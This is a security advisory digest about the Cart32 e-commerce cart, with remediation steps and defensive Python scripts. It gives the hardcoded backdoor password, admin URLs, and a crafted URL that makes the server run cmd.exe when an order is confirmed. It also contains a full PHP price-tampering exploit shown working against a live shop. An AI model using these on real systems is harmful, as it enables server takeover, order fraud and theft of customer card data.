COMMAND
Cart32
SYSTEMS AFFECTED
Any Win32 based web server using Cart32
PROBLEM
Following is based on the Cerberus Information Security Advisory by
David and Mark Litchfield. The Cerberus Security Team has
discovered a serious security hole in McMurtrey/Whitaker &
Associates, Inc's Win32 e-Commerce shopping cart, namely Cart32,
that can only be described as a blatant backdoor. Within
cart32.exe, the main file that provides the cart's functionality,
there is a secret hidden password that can be used to gain vital
information such as other passwords; using these an attacker
can modify the shopping cart's properties so that arbitrary
commands may be run on the server, and can gain access to
customers' credit card details, shipping addresses and other
highly sensitive information.
Within cart32.exe there is a secret backdoor password of "wemilo"
(found at file offset 0x6204h) known internally as the
Cart32Password. With knowledge of this password an attacker can
go to one of several undocumented URLs such as
http://charon/scripts/cart32.exe/cart32clientlist
and obtain a list of the passwords for each Cart32 client. (A client
is essentially a shop site.) Although these passwords appear to
be hashed they can still be used. For example they can be
embedded in a specially crafted URL that will allow the attacker
to prime the server to run an arbitrary command when an order is
confirmed:
http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt
This URL will set the cart's properties to spawn a shell, perform
a directory listing and pipe the output to a file called file.txt
on the root of the C: drive when an order is confirmed. After
doing this the attacker would then create a spurious order and
confirm it thus executing the command. (Please note that the
above URL is pertinent only to an internal Cerberus server -
password details and client info would need to be changed to
reflect the site in question).
Further to this the Cerberus Security Team has found what is,
perhaps, a second backdoor. By going directly to the following
URL
http://charon/scripts/c32web.exe/ChangeAdminPassword
it is possible to change the administrative password without
knowledge of the previous one.
Because the 'wemilo' string is stored as Unicode (each character
followed by a null byte), a plain ASCII search will not find it;
try looking for "w\0e\0m\0i\0l\0o\0" instead. Also, there's a
version of 'strings' for NT that finds both ASCII strings and
Unicode strings over at www.sysinternals.com in the
'miscellaneous' section of their NT stuff.
Another interesting Cart32 command was mentioned by Cassius. Ex:
http://example.com/cgi-bin/cart32.exe/expdate
This causes an error and displays a debugging page with server
variables, the contents of the Cart32 administration directory
and sometimes the contents of cgi-bin. This makes it easy to
spot misconfigured Cart32 installs (customer databases installed
to the cgi-bin directory). You could fix this one in a hex editor
by changing the /EXPDATE string to something random.
Bunny69 added more. While messing around with Cart32, he
discovered the following bug (the existence of such bugs in
e-carts is well known, but it had never been found in Cart32).
When a user clicks on a product he's interested in, he sees a form
where he can add this product to his cart; the problem is that the
price of the product is passed to the Cart32 system by a "hidden"
HTML form field named Price. A simple edit of this field will
permit a malicious attacker to buy products at the desired price
(probably $0). This was tested on versions 2.5a and 3.0.
Exploiting this hole is extremely easy: one simply saves the
web page of the desired product to disk, edits the HTML
source, changes the price to 0, opens the page again and submits
the form - voila, a nice new Porsche 911 for the nice price of
$1.99.
cart32.phtml (a PHP exploit for Cart32 Stupidity):
    <?php
    /*
    Caution - long lines ahead.
    Cart32.phtml
    Bypass lame "security" options by providing our own referer
    and tainted data via POST.
    cdi@thewebmasters.net

    PostToHost()
    Heavily modified version of Rasmus' PostToHost function
    It's generic enough to handle any method containing
    just about any data.
    $data:   urlencoded QUERY_STRING format
    $cookie: urlencoded cookie string format (name=value;name=value).
    */
    function PostToHost($host="", $port="80", $method="POST", $path="",
                        $data="", $refer="", $client="", $cookie="")
    {
        $fp = fsockopen($host, $port);
        if (!$fp) { echo "Failed to open port"; exit; }
        // Request line, then the headers the cart's "security" options
        // look at: Referer (domain check) and the method (Require POST).
        fputs($fp, "$method $path HTTP/1.0\n");
        if ($cookie != "") { fputs($fp, "Cookie: $cookie\n"); }
        if ($refer  != "") { fputs($fp, "Referer: $refer\n"); }
        if ($client != "") { fputs($fp, "User-Agent: $client\n"); }
        if ($method == "POST")
        {
            fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
            fputs($fp, "Content-length: " . strlen($data) . "\n");
        }
        fputs($fp, "Connection: close\n\n");
        if ($method == "POST")
        {
            fputs($fp, "$data\n");
        }
        // Read the whole response (status line, headers and body) back.
        $results = "";
        while (!feof($fp))
        {
            $results .= fgets($fp, 1024);
        }
        fclose($fp);
        return $results;
    }

    // Whee, now all we need to do is set up the data
    $host   = 'www.cart32.com';
    $port   = 80;
    $method = "POST";
    $path   = '/cgi-bin/cart32.exe/justsocks-AddItem';
    $refer  = 'www.IGuessYouDontTakeYourOwnAdvice.com';
    // And even if they did, we could set the Referer to match
    // anything we wanted.
    $client = 'CDI Spoof (v1.0)';
    $cookie = "";
    // Real price of this product was $6.99
    $data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
    // And now call the function
    $raw = PostToHost($host, $port, $method, $path, $data, $refer, $client, $cookie);
    print "<PRE>\n\n";
    print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
    print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
    print " Data: [$data]\n";
    print "</PRE>\n";
    print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
    print "$raw\n";
    ?>
The JustSocks site is real and is hosted by Cart32.com - the data
sent above resulted in the following: (html removed)
Host: www.cart32.com
Port: [80]
Method: [POST]
Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
Client: [CDI Spoof (v1.0)]
Cookie: []
Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]
Results of operation:
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 23 May 2000 20:54:04 GMT
Content-type: text/html
Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT
SOLUTION
Cerberus recommends that the following steps be actioned
immediately. Cerberus has tested this in their labs and the Cart
functionality will not be broken by following these steps.
1) Download a Hex Editor such as UltraEdit and edit cart32.exe
changing the "wemilo" password to something else. This
will address the first issue.
2) Because c32web.exe is the administration program for Cart32
only site administrators will need access to it. Set the
NTFS permissions on this file so that only Administrators
have access to it. This way anyone attempting to access
this file to change the admin password will be prompted for
an NT account and password. For other "servers" such as
Windows 95 and 98 Cerberus recommends removing this file.
Dildog and Weld Pond from L0pht made the following fix. The Cartfix
program is a quick temporary solution for users waiting for a
permanent fix from the Cart32 vendor, McMurtrey/Whitaker &
Associates. The Cartfix program searches for the secret backdoor
password in the cart32.exe program and replaces it with a random
backdoor password. It also changes the ACL on the c32web.exe
administration program so that anonymous users cannot change the
administrator password for Cart32. This ACL fix will only work on
Windows NT/2000 systems.
This patch in no way makes the Cart32 software secure. It
merely eliminates the two problems detailed in the Cerberus
Information Security advisory. The security problems in this
software are at a basic design level and may take several days
for the vendor to fix. This patch will allow users of Cart32 to
be safe from these high risk vulnerabilities while awaiting this
fix. Executable file:
http://www.l0pht.com/advisories/cartfix.exe
Source code:
http://www.l0pht.com/advisories/cartfixsrc.zip
You must be logged on as administrator to run the program. Press
the browse button and select the directory that contains the
cart32 software. This is usually cgi-bin or scripts. After the
directory is selected press 'patch' to patch your cart32
installation.
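As an added illustration of what the hand search above and the Cartfix program both do (this is not code from the advisory, from Cerberus or from L0pht), the following Python script locates the backdoor password as a null-padded Unicode string, which an ASCII-only strings search misses, and overwrites it with a random string of the same length so that no other offset in the executable moves. The sample byte buffer is constructed here and is not the real cart32.exe, so the offset it reports is not 0x6204.

```python
import secrets
import string

BACKDOOR = "wemilo"

# Constructed sample "binary" (not the real cart32.exe): a small UTF-16LE
# string table with the backdoor password embedded as w\0e\0m\0i\0l\0o\0.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 28
    + "Cart32Password".encode("utf-16-le") + b"\x00\x00"
    + BACKDOOR.encode("utf-16-le") + b"\x00\x00"
    + "cart32clientlist".encode("utf-16-le") + b"\x00\x00"
)


def find_backdoor(data, password=BACKDOOR):
    """Return every offset at which password occurs as a UTF-16LE string.

    An ASCII search for b"wemilo" finds nothing because of the interleaved
    null bytes, which is why the advisory says to look for the padded form.
    """
    needle = password.encode("utf-16-le")
    offsets, start = [], 0
    while (pos := data.find(needle, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets


def random_password(length):
    """Random replacement of exactly `length` characters from a crypto RNG."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def patch_backdoor(data, password=BACKDOOR, replacement=None):
    """Overwrite each UTF-16LE occurrence with a same-length random string.

    Same length is enforced so no other offset in the executable moves;
    this is the in-place edit the hex-editor step and Cartfix perform.
    Returns (patched_bytes, replacement) so the new value can be recorded.
    """
    if replacement is None:
        replacement = random_password(len(password))
    if len(replacement) != len(password):
        raise ValueError("replacement must be the same length as the original")
    old = password.encode("utf-16-le")
    new = replacement.encode("utf-16-le")
    return data.replace(old, new), replacement
```

Run find_backdoor over the bytes of an installed cart32.exe to check whether it still carries the original password, and keep the returned replacement somewhere safe, since the cart itself will still accept it.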
As for what Bunny69 discovered, that "hole" is avoided by setting
"Domain(s) to Accept Orders" in the 'Advanced' Tab. If the
referral URL does not match one of those domains provided, the
order will not go through. To quote from Cart32 v3.0 Help:
Domain(s) To Accept Orders
This is a list of domain names or IP addresses in which to
accept orders. This would be your website. This prevents a
user from downloading a page containing product information
and then changing the price or other parameter and then
submitting the order. You can use one domain name or several
separated by commas. Ex. www.cart32.com or www.cart32.com,
cart32.com, 207.150.83.60 (END QUOTE)
Of course, there are ways to get around the referrer check, which
is why the "Require POST" option exists: it means the form must
be submitted using 'POST' and not 'GET'. Again, there are ways
to avoid that check as well (for example, by creating your own
simplistic "web browser", which is exactly what the PHP script
above does). However, all Cart32 users should skim through their
orders for any noticeable price errors.
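As an added example (not code from the advisory, from Cart32 or from any of the people quoted above), the following Python audit automates that skim: it decodes AddItem data in the format the PHP script above posts, re-derives the price from a server-side catalogue keyed by PartNo, and flags any order whose client-supplied Price disagrees. The catalogue and the order log are constructed here; the only figure taken from the page is the $6.99 real price of part F6092.

```python
from decimal import Decimal
from typing import Optional
from urllib.parse import parse_qs

# Constructed catalogue keyed by PartNo. The single entry is the JustSocks
# item from the PHP script above; its real price is given there as $6.99.
CATALOG = {"F6092": Decimal("6.99")}

# Constructed order log: the tampered AddItem data from the PHP script, an
# honest submission, and a price-set-to-0 submission as Bunny69 described.
ORDERS = [
    "Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL",
    "Price=6.99&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=1&p1=M",
    "Price=0&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=2",
]


def parse_add_item(data):
    """Decode the urlencoded AddItem body into the fields the cart trusts."""
    fields = parse_qs(data, keep_blank_values=True)

    def first(name, default):
        return (fields.get(name) or [default])[0] or default

    return {"part": first("PartNo", ""),
            "price": Decimal(first("Price", "0")),
            "qty": int(first("Qty", "0"))}


def audit_order(data, catalog=CATALOG) -> Optional[str]:
    """Return a finding if the client-supplied Price disagrees with the catalogue.

    Referer and Require-POST checks only stop a browser-resubmitted form; a
    hand-built request like the PHP script above passes both, so the price
    is recomputed server-side from PartNo instead of being trusted.
    """
    item = parse_add_item(data)
    expected = catalog.get(item["part"])
    if expected is None:
        return f"{item['part']}: unknown PartNo"
    if item["price"] != expected:
        delta = (item["price"] - expected) * item["qty"]
        return (f"{item['part']}: submitted {item['price']} x{item['qty']}, "
                f"catalogue {expected} (delta {delta:+})")
    return None


def audit_orders(orders, catalog=CATALOG):
    """Run audit_order over a whole order log and keep only the findings."""
    return [f for f in (audit_order(o, catalog) for o in orders) if f]
```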